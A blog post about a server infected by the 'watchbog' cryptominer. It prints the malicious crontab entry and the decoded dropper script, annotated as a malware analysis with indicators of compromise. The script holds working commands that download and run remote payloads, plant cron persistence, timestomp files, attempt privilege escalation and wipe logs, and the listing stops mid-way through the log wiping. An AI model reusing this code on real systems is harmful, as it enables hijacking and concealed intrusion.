版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/zhangvalue/article/details/87928551
之前正常使用了一台阿里云服务器,这几天一直自动挂掉
查看了最近一天的cpu都是接近100%爆表了,今天早上top了一下发现了,主要占据的是watchbog,占用了cpu的99.0%,
挖矿木马.进程名为watchbog
后来查看了一下发现这个木马覆盖/改写了机器上几乎所有的cron入口(当前用户的crontab、root的crontab、/etc/cron.d/、/etc/cron.hourly|daily|monthly/以及/etc/crontab),每隔几分钟就由crond拉取远程脚本并通过`|bash`执行,重新下载并拉起挖矿木马。注意定时任务里跑的并不是本机文件,而是每次从pastebin/gitee/onion等多个备用地址实时下载的内容,所以只删本地文件、不清干净这些cron入口是不能根除的。
crontab -l列出当前用户的定时任务
[root@spark ~]# crontab -l
*/9 * * * * (curl -fsSL https://pastebin.com/raw/AgdgACUD||wget -q -O- https://pastebin.com/raw/AgdgACUD||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/uiZvwxG8").read()'||curl -fsSL https://gitee.com/return_block/party_1/raw/master/main/api/README.md||wget -q -O - https://gitee.com/return_block/party_1/raw/master/main/api/README.md||curl -fsSL https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt)|bash
##
打开这个URL,返回的是一段base64编码的文本(注意base64只是编码不是加密,任何人都能还原)。crontab里是直接`|bash`执行,意味着攻击者只要改pastebin上的内容就能随时更换载荷。不要在受害机器上执行它,离线用`base64 -d`解码后的内容如下(本文列表中省略了内嵌的python载荷):
#!/bin/bash
# NOTE(review): this is the decoded dropper/persistence stage of the
# "watchbog" cryptominer as recovered from the cron job above, reproduced
# verbatim for analysis only. Do NOT run it. Every URL, path and marker file
# below is an indicator of compromise, not something to download or keep.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
#This is the TnF job copy
# --- system(): root persistence via /etc/crontab + /bin/httpntp ---
# Deletes any existing /bin/httpntp and its /etc/crontab line, re-downloads
# the stage from pastebin to /bin/httpntp (curl, then wget as fallback), and
# appends a daily 01:00 root job. The function name is misleading on purpose;
# nothing here is a system component. IoCs: /bin/httpntp and the line
# "0 1 * * * root /bin/httpntp" in /etc/crontab. Called only on the root path.
function system() {
rm -rf /bin/httpntp
# Rewrites /etc/crontab without the httpntp line (the original file is
# replaced by a fresh one via mv).
grep -v "/bin/httpntp" /etc/crontab > /etc/crontab.bak && mv /etc/crontab.bak /etc/crontab
if [ ! -f "/bin/httpntp" ]; then
curl -fsSL https://pastebin.com/raw/3XEzey2T -o /bin/httpntp && chmod 755 /bin/httpntp
if [ ! -f "/bin/httpntp" ]; then
wget https://pastebin.com/raw/3XEzey2T -O /bin/httpntp && chmod 755 /bin/httpntp
fi
# Both branches append the identical line; the -f test is dead logic since
# >> creates the file anyway.
if [ ! -f "/etc/crontab" ]; then
echo -e "0 1 * * * root /bin/httpntp" >> /etc/crontab
else
echo -e "0 1 * * * root /bin/httpntp" >> /etc/crontab
fi
fi
}
# --- dragon(): detached second-stage Python payload ---
# Backgrounds a python process that exec()s a base64 blob and drops the
# marker /tmp/.tmpza. The blob is elided from this listing, so what it does
# cannot be determined here; the same blob is run synchronously by elevate()
# below. dragon() is not called anywhere in the visible script (presumably
# from the elided part). A running `python -c "import base64;exec(...)"`
# process is therefore an IoC in its own right.
function dragon() {
nohup python -c "import base64;exec(base64.b64decode('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'))" >/dev/null 2>&1 &
touch /tmp/.tmpza
}
# --- cronhigh(): root-level cron persistence, seven locations + timestomping ---
# Every entry re-fetches the stage from pastebin and pipes it to bash, so the
# attacker can swap the payload at any time. Cleanup must cover ALL of:
#   /etc/cron.d/root, /etc/cron.d/system, /var/spool/cron/root,
#   /var/spool/cron/crontabs/root, /etc/cron.hourly/Anacron,
#   /etc/cron.daily/Anacron, /etc/cron.monthly/Anacron.
function cronhigh() {
# Strips the immutable attribute first, defeating the common
# "chattr +i my crontab" cleanup/hardening trick.
chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root
rm -rf /etc/cron.hourly/Anacron /etc/cron.daily/Anacron /etc/cron.monthly/Anacron
# cron.d format (with user field) every 3 and 5 minutes; the trailing "##"
# line is the one visible in the crontab -l output above.
echo -e "*/3 * * * * root (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /etc/cron.d/root
echo -e "*/5 * * * * root (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /etc/cron.d/system
# Spool format (no user field). Uses `>` so root's existing crontab is
# destroyed, not appended to. Both the RHEL (/var/spool/cron/root) and the
# Debian (/var/spool/cron/crontabs/root) layouts are written.
echo -e "*/7 * * * * (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "*/9 * * * * (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /var/spool/cron/crontabs/root
# Copies of the stage itself installed as run-parts scripts under a name
# chosen to blend in with anacron.
mkdir -p /etc/cron.hourly
curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.hourly/Anacron && chmod 755 /etc/cron.hourly/Anacron
if [ ! -f "/etc/cron.hourly/Anacron" ]; then
wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.hourly/Anacron && chmod 755 /etc/cron.hourly/Anacron
fi
mkdir -p /etc/cron.daily
curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.daily/Anacron && chmod 755 /etc/cron.daily/Anacron
if [ ! -f "/etc/cron.daily/Anacron" ]; then
wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.daily/Anacron && chmod 755 /etc/cron.daily/Anacron
fi
mkdir -p /etc/cron.monthly
curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.monthly/Anacron && chmod 755 /etc/cron.monthly/Anacron
if [ ! -f "/etc/cron.monthly/Anacron" ]; then
wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.monthly/Anacron && chmod 755 /etc/cron.monthly/Anacron
fi
# Timestomping: copies /bin/sh's atime/mtime onto every dropped file so that
# "recently modified" triage (ls -lt, find -mtime/-newer) misses them.
# Defender note: touch cannot set ctime, so `stat` / `find -cnewer` and a
# plain `grep -r pastebin /etc/cron* /var/spool/cron` still find them.
touch -acmr /bin/sh /var/spool/cron/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
touch -acmr /bin/sh /etc/cron.d/system
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /etc/cron.hourly/Anacron
touch -acmr /bin/sh /etc/cron.daily/Anacron
touch -acmr /bin/sh /etc/cron.monthly/Anacron
}
# --- cronlow(): per-user (non-root) cron persistence ---
# Intended to install a */1 job only if one is not already present.
# Observed bug: `grep -q` prints nothing, so `wc -l` is always 0 and the
# "doesn't exist" branch runs on EVERY invocation. Net effect: `crontab -r`
# wipes whatever the current user had in cron each time this stage runs,
# then the malicious entry is re-added. This is why the blog author saw all
# cron entries "modified".
function cronlow() {
cr=$(crontab -l | grep -q "https://pastebin.com/raw/3XEzey2T" | wc -l)
if [ ${cr} -eq 0 ];then
echo "Cron dosen't exists"
crontab -r
(crontab -l 2>/dev/null; echo "*/1 * * * * (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash > /dev/null 2>&1")| crontab -
else
echo "Cron exists"
fi
}
# --- downloadlow(): fetch and start the miner from a user-writable /tmp dir ---
# Runs only when no process named "watchbog" is visible in ps. The working
# directory name is chosen to resemble a systemd PrivateTmp directory
# ("systemd-private-<id>-<unit>.service-<rand>") so it blends into /tmp
# listings. Drops config.json (base64-decoded from ptpb.pw) and an
# arch-specific "watchbog" binary (x86_64 from ptpb.pw/D8r9, anything else
# from pixeldra.in), chmod 777, started detached with nohup. The file names
# are consistent with a miner config, but the contents are not in this
# listing — verify from the actual samples. Note the i686 branch and the
# final else branch are identical.
# IoC dir: /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/
function downloadlow() {
pa=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
if [ ${pa} -eq 0 ];then
mkdir -p /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/*
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json" ]; then
curl -fsSL https://ptpb.pw/WpNh | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json" ]; then
wget https://ptpb.pw/WpNh -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json
fi
fi
# Binary selection by architecture; curl first, wget as fallback.
ARCH=$(uname -m)
if [ "$ARCH" == "x86_64" ]; then
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
curl -fsSL https://ptpb.pw/D8r9 -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
wget https://ptpb.pw/D8r9 -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
fi
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
fi
elif [ "$ARCH" == "i686" ]; then
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
wget https://pixeldra.in/api/download/nZ2s4L -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
fi
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
fi
else
# Identical to the i686 branch: same pixeldra.in binary for any other arch.
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
wget https://pixeldra.in/api/download/nZ2s4L -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
fi
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
fi
fi
fi
}
# --- downloadhigh(): root variant of downloadlow(), dropping into /bin ---
# Same download sources and arch logic as downloadlow(), but the miner and
# its config live in /bin (world-writable 777) — the /bin/watchbog the blog
# author found. Existing copies are deleted first so a fresh binary is
# always fetched when no "watchbog" process is running.
# IoCs: /bin/watchbog, /bin/config.json.
function downloadhigh() {
pb=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
if [ ${pb} -eq 0 ];then
rm -rf /bin/config.json /bin/watchbog
if [ ! -f "/bin/config.json" ]; then
curl -fsSL https://ptpb.pw/WpNh | base64 -d > /bin/config.json && chmod 777 /bin/config.json
if [ ! -f "/bin/config.json" ]; then
wget https://ptpb.pw/WpNh -O - | base64 -d > /bin/config.json && chmod 777 /bin/config.json
fi
fi
ARCH=$(uname -m)
if [ "$ARCH" == "x86_64" ]; then
if [ ! -f "/bin/watchbog" ]; then
curl -fsSL https://ptpb.pw/D8r9 -o /bin/watchbog && chmod 777 /bin/watchbog
if [ ! -f "/bin/watchbog" ]; then
wget https://ptpb.pw/D8r9 -O /bin/watchbog && chmod 777 /bin/watchbog
fi
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
fi
elif [ "$ARCH" == "i686" ]; then
if [ ! -f "/bin/watchbog" ]; then
curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /bin/watchbog && chmod 777 /bin/watchbog
if [ ! -f "/bin/watchbog" ]; then
wget https://pixeldra.in/api/download/nZ2s4L -O /bin/watchbog && chmod 777 /bin/watchbog
fi
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
fi
else
# Identical to the i686 branch.
if [ ! -f "/bin/watchbog" ]; then
curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /bin/watchbog && chmod 777 /bin/watchbog
if [ ! -f "/bin/watchbog" ]; then
wget https://pixeldra.in/api/download/nZ2s4L -O /bin/watchbog && chmod 777 /bin/watchbog
fi
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
fi
fi
fi
}
# --- testhigh(): alternative (x86_64-only) miner build dropped into /bin ---
# Fallback used by the root path when downloadhigh() left no "watchbog"
# process. Fetches a different binary (ptpb.pw/mNJt) plus three base64-
# decoded support files (config.txt, cpu.txt, pools.txt). On non-x86_64 the
# support files are removed again and nothing is started.
# IoCs: /bin/watchbog, /bin/config.txt, /bin/cpu.txt, /bin/pools.txt.
function testhigh() {
pb=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
if [ ${pb} -eq 0 ];then
rm -rf /bin/watchbog /bin/config.json
if [ ! -f "/bin/config.txt" ]; then
curl -fsSL https://ptpb.pw/KAlo | base64 -d > /bin/config.txt && chmod 777 /bin/config.txt
if [ ! -f "/bin/config.txt" ]; then
wget https://ptpb.pw/KAlo -O - | base64 -d > /bin/config.txt && chmod 777 /bin/config.txt
fi
fi
if [ ! -f "/bin/cpu.txt" ]; then
curl -fsSL https://ptpb.pw/Nqo- | base64 -d > /bin/cpu.txt && chmod 777 /bin/cpu.txt
if [ ! -f "/bin/cpu.txt" ]; then
wget https://ptpb.pw/Nqo- -O - | base64 -d > /bin/cpu.txt && chmod 777 /bin/cpu.txt
fi
fi
if [ ! -f "/bin/pools.txt" ]; then
curl -fsSL https://ptpb.pw/9Lyg | base64 -d > /bin/pools.txt && chmod 777 /bin/pools.txt
if [ ! -f "/bin/pools.txt" ]; then
wget https://ptpb.pw/9Lyg -O - | base64 -d > /bin/pools.txt && chmod 777 /bin/pools.txt
fi
fi
ARCH=$(uname -m)
if [ "$ARCH" == "x86_64" ]; then
if [ ! -f "/bin/watchbog" ]; then
curl -fsSL https://ptpb.pw/mNJt -o /bin/watchbog && chmod 777 /bin/watchbog
if [ ! -f "/bin/watchbog" ]; then
wget https://ptpb.pw/mNJt -O /bin/watchbog && chmod 777 /bin/watchbog
fi
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
fi
else
# No binary for other architectures: undo the support-file drop.
rm -rf /bin/cpu.txt /bin/pools.txt /bin/config.txt
fi
fi
}
# --- testlow(): testhigh() equivalent for the user-writable /tmp directory ---
# Same alternative binary (ptpb.pw/mNJt, x86_64 only) and the same three
# support files, but placed in the fake systemd-private directory used by
# downloadlow(). The directory is wiped before the drop.
function testlow() {
pb=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
if [ ${pb} -eq 0 ];then
mkdir -p /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/*
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt" ]; then
curl -fsSL https://ptpb.pw/KAlo | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt" ]; then
wget https://ptpb.pw/KAlo -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt
fi
fi
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt" ]; then
curl -fsSL https://ptpb.pw/Nqo- | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt" ]; then
wget https://ptpb.pw/Nqo- -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt
fi
fi
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt" ]; then
curl -fsSL https://ptpb.pw/9Lyg | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt" ]; then
wget https://ptpb.pw/9Lyg -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt
fi
fi
ARCH=$(uname -m)
if [ "$ARCH" == "x86_64" ]; then
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
curl -fsSL https://ptpb.pw/mNJt -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
wget https://ptpb.pw/mNJt -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
fi
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
fi
else
# No binary for other architectures: undo the support-file drop.
rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt
fi
fi
}
# --- successhigh(): one-time check-in after the miner started as root ---
# Fetches a pastebin URL and writes the marker /tmp/.tmpc, which suppresses
# further calls. The fetched body is only written to stdout (not executed
# here), so this looks like a success beacon; what the URL returned is not
# in this listing. Outbound requests to pastebin from cron are the
# detection opportunity.
function successhigh() {
(curl -fsSL https://pastebin.com/raw/eCZwXCiK || wget -q -O - https://pastebin.com/raw/eCZwXCiK)
touch /tmp/.tmpc
}
# --- successlow(): non-root counterpart of successhigh() ---
# Same pattern, different pastebin URL, same /tmp/.tmpc marker.
function successlow() {
(curl -fsSL https://pastebin.com/raw/fMXdbHRs || wget -q -O - https://pastebin.com/raw/fMXdbHRs)
touch /tmp/.tmpc
}
# --- elevate(): privilege-escalation attempt (non-root path only) ---
# On x86_64 with python available, runs the same base64 Python blob that
# dragon() backgrounds, this time synchronously. The blob is elided from this
# listing, so WHICH vulnerability it exploits cannot be determined here —
# treat any host that reached this code as potentially root-compromised
# even if the miner is seen running as an unprivileged user. Success is
# judged indirectly after 30 s: no /tmp/activate marker and a "watchbog"
# process whose owner column is "root". Every other outcome falls back to
# user-level persistence (cronlow + downloadlow).
function elevate() {
ARCH=$(uname -m)
if [ "$ARCH" == "x86_64" ]; then
echo "The Arch Is Supported lets GO On"
python -V >/dev/null 2>&1
if [ "$?" = "0" ]; then
echo "Python Is Avalaible lets GO On"
python -c "import base64;exec(base64.b64decode('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'))" >/dev/null 2>&1
else
cronlow
downloadlow
fi
sleep 30
# /tmp/activate is presumably written by the elided payload on failure;
# its absence is read as "exploit worked".
if [ ! -f "/tmp/activate" ]; then
echo "I guess The Exploit worked"
pmp=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
if [ ${pmp} -ne 0 ];then
# Owner (USER column) of the miner process; compared to "root" below.
pup=$(ps auxf | grep 'watchbog' | grep -v grep | awk '{print $1}')
if [ "$pup" == "root" ];then
echo "The Exploit worked Successfully"
echo "Hahahahha"
rm -rf /tmp/elevate
cronlow
exit 0
else
cronlow
downloadlow
fi
else
cronlow
downloadlow
fi
else
rm -rf /tmp/elevate
rm -rf /tmp/activate
cronlow
downloadlow
fi
else
cronlow
downloadlow
fi
}
# ---------------------------------------------------------------------------
# Entry point (top-level statements). Flow:
#   1. "update" flag fetched from pastebin; on match calls spreada(), which is
#      NOT defined anywhere in this listing (presumably in the elided part).
#   2. One-shot kill of any running watchbog (marker /tmp/.tmpnewasss).
#   3. Non-root: wipe user crontab, try elevate() once (/tmp/.tmpleve), else
#      downloadlow; always cronlow.
#   4. Root: system + cronhigh + downloadhigh, testhigh/downloadlow/testlow
#      as fallbacks, then log wiping.
# Marker files (all IoCs): /tmp/.tmpza /tmp/.tmpold /tmp/.tmpnewasss
# /tmp/.tmpnewzz /tmp/.tmpleve /tmp/.tmpelev /tmp/.tmpc /tmp/activate
# /tmp/elevate
# ---------------------------------------------------------------------------
update=$( (curl -fsSL --max-time 120 https://pastebin.com/raw/2unJiD3b) )
# Misused "x-guard": only the right side gets the x, so this compares the
# fetched body against the literal string "updatex".
if [ "$update" == "update"x ];then
echo "An update exists boss"
rm -rf /tmp/.tmpza
if [ ! -f "/tmp/.tmpold" ]; then
spreada
fi
else
echo "NO update exists boss"
fi
BS=$( whoami )
echo "I am $BS"
# First run on this host only: kill any already running miner so the new
# build below replaces it. The marker is never removed, so this does not
# repeat.
if [ ! -f "/tmp/.tmpnewasss" ]; then
touch /tmp/.tmpnewasss
rm /tmp/.tmpnewzz
ps auxf|grep -v grep|grep "watchbog" | awk '{print $2}'|xargs kill -9
pkill -f watchbog
fi
# ---- non-root path ----
if [ "$BS" != "root" ];then
if [ ! -f "/tmp/.tmpleve" ]; then
crontab -r
ps auxf|grep -v grep|grep "watchbog" | awk '{print $2}'|xargs kill -9
pkill -f watchbog
fi
# $? below is the exit status of `wc -l`, which is 0 whatever the count,
# so the "It's running boss" branch is dead and the else branch always runs.
ps -fe|grep 'watchbog'|grep -v grep|wc -l
if [ $? -ne 0 ];then
echo "It's running boss"
crontab -r
cronlow
else
if [ ! -f "/tmp/.tmpleve" ]; then
rm -rf /tmp/.tmpelev
touch /tmp/.tmpleve
elevate
else
downloadlow
fi
cronlow
sleep 15
# ${pm} is read before its first assignment (two lines below); with pm
# empty this becomes `[ -eq 0 ]`, which bash rejects ("unary operator
# expected"), so testlow is skipped on the non-root path.
if [ ${pm} -eq 0 ];then
testlow
fi
pm=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
if [ ${pm} -ne 0 ];then
if [ ! -f "/tmp/.tmpc" ]; then
successlow
fi
fi
fi
fi
# ---- root path ----
if [ "$BS" == "root" ];then
# Same dead `$?` check as above: the else branch always runs.
ps -fe|grep 'watchbog'|grep -v grep|wc -l
if [ $? -ne 0 ];then
echo "It's running boss"
system
cronhigh
downloadhigh
else
system
cronhigh
downloadhigh
sleep 15
pm=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
if [ ${pm} -ne 0 ];then
if [ ! -f "/tmp/.tmpc" ]; then
successhigh
fi
fi
sleep 30
# pm is never refreshed after the assignment above, so each inner
# `-ne 0` check is unreachable whenever its outer `-eq 0` held; the
# fallbacks still run and may start a miner, just without the beacon.
if [ ${pm} -eq 0 ];then
testhigh
if [ ${pm} -ne 0 ];then
successhigh
fi
fi
if [ ${pm} -eq 0 ];then
downloadlow
if [ ${pm} -ne 0 ];then
successlow
fi
fi
if [ ${pm} -eq 0 ];then
testlow
if [ ${pm} -ne 0 ];then
successlow
fi
fi
fi
# ---- anti-forensics (root only) ----
# `0>file` opens the file for writing on fd 0, truncating it, while echo's
# output still goes to stdout — net effect: each file is emptied. Login
# history (wtmp), the auth log (secure), the cron log and root's mail are
# destroyed, and syslog lines mentioning pastebin/github are deleted.
# Defender note: after this runs the host's own logs cannot be relied on to
# establish initial access or timeline; use off-host / cloud-side logs.
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
